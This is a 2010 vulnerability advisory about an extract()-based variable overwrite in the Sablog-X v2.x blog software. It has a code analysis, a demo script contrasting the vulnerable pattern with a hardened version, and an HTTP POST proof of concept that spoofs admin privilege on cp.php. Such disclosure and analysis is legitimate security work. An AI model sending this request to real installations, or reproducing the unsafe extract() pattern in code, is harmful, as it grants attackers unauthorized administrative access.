Sablog-X v2.x arbitrary variable overwrite vulnerability - Vulnerability Warning - Black Bar Safety Net (myhack58)

2010-02-19T00:00:00
ID MYHACK58:62201026206
Type myhack58
Reporter Anonymous (佚名)
Modified 2010-02-19T00:00:00

Description

Author: 80vul-B team, http://www.80vul.com

I. Description

Because of a logic flaw in the way common.inc.php in Sablog-X v2.x initialises $_EVO, extract() can be used to overwrite arbitrary variables, which ultimately leads to XSS, SQL injection, code execution and many other serious security vulnerabilities.

II. Analysis

common.inc.php code:

```php
....
$onoff = function_exists('ini_get') ? ini_get('register_globals') : get_cfg_var('register_globals');
if ($onoff != 1) {
    @extract($_COOKIE, EXTR_SKIP);
    @extract($_POST, EXTR_SKIP);
    @extract($_GET, EXTR_SKIP);
}
...
$sax_auth_key = md5($onlineip.$_SERVER['HTTP_USER_AGENT']);
list($sax_uid, $sax_pw, $sax_logincount) = $_COOKIE['sax_auth'] ? explode("\t", authcode($_COOKIE['sax_auth'], 'DECODE')) : array('', '', '');
$sax_hash = sax_addslashes($_COOKIE['sax_hash']);
...
$seccode = $sessionexists = 0;
if ($sax_hash) {
    ...
    if ($_EVO = $DB->fetch_array($query)) {
        // $_EVO is only initialised inside if ($sax_hash); when that condition
        // is not met, the initialisation is skipped entirely.
        ...
    }
}
if (!$sessionexists) {
    if ($sax_uid) {
        if (!($_EVO = $DB->fetch_one_array("SELECT $userfields FROM {$db_prefix}users u WHERE u.userid='$sax_uid' AND u.password='$sax_pw' AND u.lastip='$onlineip'"))) {
            ...
        }
    }
}
@extract($_EVO); // overwrites arbitrary variables
```

As the code above shows, as long as $sax_hash and $sax_uid both evaluate to false, $_EVO is never assigned a value; because both of these variables come from $_COOKIE, $_EVO can easily be controlled, and extract() then overwrites arbitrary variables, leading to XSS, SQL injection, code execution and many other serious security vulnerabilities :)
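The following PHP script is an added example, not Sablog-X's own code: it models the $_EVO initialisation path described above with the vulnerable pattern next to a hardened rewrite, and runs from the CLI without a web server or database. lookup_user_stub() is an assumed stand-in for the $DB->fetch_one_array() lookup and always reports "no row"; the $cookie and $post arrays are constructed to resemble the request shape the analysis describes (no auth cookies, an _EVO array in the POST body), and the authcode() decoding of sax_auth is omitted.

```php
<?php
// Added example (not Sablog-X's own code): a CLI-runnable model of the $_EVO
// initialisation flow from common.inc.php, showing the vulnerable pattern next
// to a hardened rewrite. lookup_user_stub() stands in for the database query
// and always reports "no row"; the request arrays are constructed inline.

// Constructed request data: no sax_auth / sax_hash cookie, so both $sax_uid
// and $sax_hash end up falsy, and a POST body that smuggles an _EVO array.
$cookie = array();
$post   = array('_EVO' => array('sax_uid' => '1', 'sax_group' => '1'));

// Stand-in for $DB->fetch_one_array(...): no matching user row.
function lookup_user_stub($uid, $pw)
{
    return false;
}

// Vulnerable flow, mirroring the structure of the original snippet.
function vulnerable_init(array $cookie, array $post)
{
    // register_globals emulation: every request key becomes a local variable.
    // EXTR_SKIP only protects names that already exist, and $_EVO does not
    // exist yet, so the POSTed _EVO array is imported as $_EVO.
    @extract($cookie, EXTR_SKIP);
    @extract($post, EXTR_SKIP);

    // authcode() decoding omitted; the tab-separated "uid\tpw\tcount" layout is kept.
    $sax_uid   = isset($cookie['sax_auth']) ? explode("\t", $cookie['sax_auth'])[0] : '';
    $sax_hash  = isset($cookie['sax_hash']) ? $cookie['sax_hash'] : '';
    $sax_group = 0; // what an anonymous visitor is supposed to end up with

    if ($sax_hash) {
        // session branch: the real code assigns $_EVO from a DB row here
    }
    if ($sax_uid) {
        if (!($_EVO = lookup_user_stub($sax_uid, ''))) {
            return $sax_group; // the real code abandons the login here
        }
    }

    // Neither branch ran, so $_EVO still holds the request-supplied array and
    // extract() (default EXTR_OVERWRITE) replaces $sax_group and friends with it.
    @extract($_EVO);
    return $sax_group;
}

// Hardened flow: no request-to-variable import, unconditional initialisation,
// and an explicit allow-list instead of extract().
function hardened_init(array $cookie, array $post)
{
    $sax_uid   = isset($cookie['sax_auth']) ? explode("\t", $cookie['sax_auth'])[0] : '';
    $sax_hash  = isset($cookie['sax_hash']) ? $cookie['sax_hash'] : '';
    $sax_group = 0;

    // Initialise on every path, so no branch can leave $_EVO under request control.
    $_EVO = array();
    if ($sax_hash) {
        // session branch would fill $_EVO from the DB
    } elseif ($sax_uid) {
        $row = lookup_user_stub($sax_uid, '');
        if (is_array($row)) {
            $_EVO = $row;
        }
    }

    // Copy only the fields the code actually expects, with explicit casts,
    // rather than letting the array decide which variables get defined.
    $allowed = array('sax_uid', 'sax_pw', 'sax_group', 'sax_logincount');
    $session = array_intersect_key($_EVO, array_flip($allowed));
    $sax_group = isset($session['sax_group']) ? (int) $session['sax_group'] : 0;
    return $sax_group;
}

echo "vulnerable_init: sax_group=" . var_export(vulnerable_init($cookie, $post), true) . "\n";
echo "hardened_init:   sax_group=" . var_export(hardened_init($cookie, $post), true) . "\n";
```

Run it with the php CLI: the first line shows $sax_group taken from the POSTed _EVO array even though no cookie was presented, the second shows it staying at 0. The two properties that matter for review are visible in hardened_init(): the variable is initialised before any conditional branch, and request data is only ever read by explicit key, never turned into variables with extract().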

III. Exploitation

The following is a PoC for backend privilege spoofing:

```http
POST http://127.0.0.1/sax/cp.php HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://127.0.0.1/sax/cp.php
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)
Host: 127.0.0.1
Content-Length: 138
Connection: Close

_EVO[sax_uid]=1&_EVO[sax_pw]=1&_EVO[sax_logincount]=1&_EVO[sax_hash]=1&_EVO[sax_group]=1&_EVO[sax_auth_key]=1&_EVO[timestamp]=1
```

IV. Patch (fix)

None available.